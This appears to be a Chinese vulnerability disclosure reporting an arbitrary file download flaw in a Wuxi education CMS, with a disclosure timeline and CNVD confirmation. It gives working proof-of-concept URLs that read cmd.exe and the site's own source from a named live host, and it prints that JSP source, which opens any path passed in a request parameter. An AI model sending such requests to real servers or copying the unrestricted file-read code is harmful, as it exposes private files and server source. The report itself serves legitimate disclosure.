2014-06-23: 细节已通知厂商并且等待厂商处理中 2014-06-27: 厂商已经确认,细节仅向厂商公开 2014-07-07: 细节向核心白帽子及相关领域专家公开 2014-07-17: 细节向普通白帽子公开 2014-07-27: 细节向实习白帽子公开 2014-08-07: 细节向公众公开
无锡市某教育系统任意文件下载漏洞
http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\WINDOWS\system32\cmd.exe
http://manage.ncjy.net/cms/web/downloadFiles.jsp?file=C:\Program Files\gpowersoft\webapps\cms\web\downloadFiles.jsp
<%@ page import="java.util.HashMap" %><%@ page import="java.util.Map"%><%@ page import="java.io.*"%><% Map typeMap = new HashMap(); //以后有扩展,可以在fileExt和mimeType里,对应的加上扩展名和mimetype String fileExt = "abs,ai,aif,aifc,aiff,aim,art,asf,asx,au,avi,avx,bcpio,bin,bmp,body,cdf,cer,class,cpio,csh,css,dib,doc,dtd,dv,dvi,eps,etx,exe,"+ "gif,gtar,gz,hdf,htc,htm,html,hqx,ico,ief,jad,jar,java,jnlp,jpe,jpeg,jpg,js,jsf,jspf,kar,latex,m3u,mac,man,mathml,me,mid,midi,mif,mov,"+ "movie,mp1,mp2,mp3,mpa,mpe,mpeg,mpega,mpg,mpv2,ms,nc,oda,odb,odc,odf,odg,odi,odm,odp,ods,odt,ogg,otg,oth,otp,ots,ott,pbm,pct,pdf,pgm,pic,"+ "pict,pls,png,pnm,pnt,ppm,pps,ppt,ps,psd,qt,qti,qtif,ras,rdf,rgb,rm,roff,rtf,rtx,sh,shar,smf,sit,snd,src,sv4cpio,sv4crc,svg,svgz,swf,t,"+ "tar,tcl,tex,texi,texinfo,tif,tiff,tr,tsv,txt,ulw,ustar,vrml,vsd,vxml,wav,wbmp,wml,wmlc,wmls,wmlscriptc,wrl,xbm,xht,xhtml,xls,xml,xpm,"+ "xsl,xslt,xul,xwd,z,zip,rar,mht"; String mimeType = "audio/x-mpeg,application/postscript,audio/x-aiff,audio/x-aiff,audio/x-aiff,application/x-aim,image/x-jg,video/x-ms-asf,video/x-ms-asf,"+ "audio/basic,video/x-msvideo,video/x-rad-screenplay,application/x-bcpio,application/octet-stream,image/bmp,text/html,application/x-netcdf,application/x-x509-ca-cert,"+ "application/java,application/x-cpio,application/x-csh,text/css,image/bmp,application/msword,application/xml-dtd,video/x-dv,application/x-dvi,"+ "application/postscript,text/x-setext,application/octet-stream,image/gif,application/x-gtar,application/x-gzip,application/x-hdf,text/x-component,"+ "text/html,text/html,application/mac-binhex40,image/x-icon,image/ief,text/vnd.sun.j2me.app-descriptor,application/java-archive,text/plain,"+ "application/x-java-jnlp-file,image/jpeg,image/jpeg,image/jpeg,text/javascript,text/plain,text/plain,audio/midi,application/x-latex,audio/x-mpegurl,"+ "image/x-macpaint,application/x-troff-man,application/mathml+xml,application/x-troff-me,audio/midi,audio/midi,application/vnd.mif,video/quicktime,"+ "video/x-sgi-movie,audio/x-mpeg,audio/mpeg,audio/mpeg,audio/x-mpeg,video/mpeg,video/mpeg,audio/x-mpeg,video/mpeg,video/mpeg2,application/x-troff-ms,"+ "application/x-netcdf,application/oda,application/vnd.oasis.opendocument.database,application/vnd.oasis.opendocument.chart,application/vnd.oasis.opendocument.formula,"+ "application/vnd.oasis.opendocument.graphics,application/vnd.oasis.opendocument.image,application/vnd.oasis.opendocument.text-master,application/vnd.oasis.opendocument.presentation,"+ "application/vnd.oasis.opendocument.spreadsheet,application/vnd.oasis.opendocument.text,application/ogg,application/vnd.oasis.opendocument.graphics-template,"+ "application/vnd.oasis.opendocument.text-web,application/vnd.oasis.opendocument.presentation-template,application/vnd.oasis.opendocument.spreadsheet-template,"+ "application/vnd.oasis.opendocument.text-template,image/x-portable-bitmap,image/pict,application/pdf,image/x-portable-graymap,image/pict,"+ "image/pict,audio/x-scpls,image/png,image/x-portable-anymap,image/x-macpaint,image/x-portable-pixmap,application/vnd.ms-powerpoint,application/vnd.ms-powerpoint,"+ "application/postscript,image/x-photoshop,video/quicktime,image/x-quicktime,image/x-quicktime,image/x-cmu-raster,application/rdf+xml,image/x-rgb,"+ "application/vnd.rn-realmedia,application/x-troff,text/rtf,text/richtext,application/x-sh,application/x-shar,audio/x-midi,application/x-stuffit,"+ "audio/basic,application/x-wais-source,application/x-sv4cpio,application/x-sv4crc,image/svg+xml,image/svg+xml,application/x-shockwave-flash,"+ "application/x-troff,application/x-tar,application/x-tcl,application/x-tex,application/x-texinfo,application/x-texinfo,image/tiff,image/tiff,"+ "application/x-troff,text/tab-separated-values,text/plain,audio/basic,application/x-ustar,model/vrml,application/x-visio,application/voicexml+xml,"+ "audio/x-wav,image/vnd.wap.wbmp,text/vnd.wap.wml,application/vnd.wap.wmlc,text/vnd.wap.wmlscript,application/vnd.wap.wmlscriptc,model/vrml,"+ "image/x-xbitmap,application/xhtml+xml,application/xhtml+xml,application/vnd.ms-excel,application/xml,image/x-xpixmap,application/xml,"+ "application/xslt+xml,application/vnd.mozilla.xul+xml,image/x-xwindowdump,application/x-compress,application/zip,application/rar,text/x-mht"; String []fileExts = fileExt.split(","); String []mimeTypes = mimeType.split(","); int len = fileExts.length; for(int i=0;i<len;i++){ typeMap.put(fileExts[i],mimeTypes[i]); } //取得文件名和扩展名 String file = request.getParameter("file"); //file = file.replace("/","\\"); String filename = file.substring(file.lastIndexOf("/")+1); String extname = filename.substring(filename.lastIndexOf(".")+1).trim().toLowerCase(); //获得文件的扩展名 response.setContentType((String)typeMap.get(extname)); response.setHeader("Content-Disposition","attachment;filename="+filename); //读入文件内容,生成新的文件 FileInputStream in = new FileInputStream(file); byte[] buf = new byte[4096]; ServletOutputStream output = response.getOutputStream(); int length; while ( (in != null) && ( (length = in.read(buf)) != -1)) { output.write(buf, 0, buf.length); } in.close(); output.flush(); output.close();%>
如上
目录限制
危害等级:中
漏洞Rank:10
确认时间:2014-06-27 22:55
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心处置。
暂无
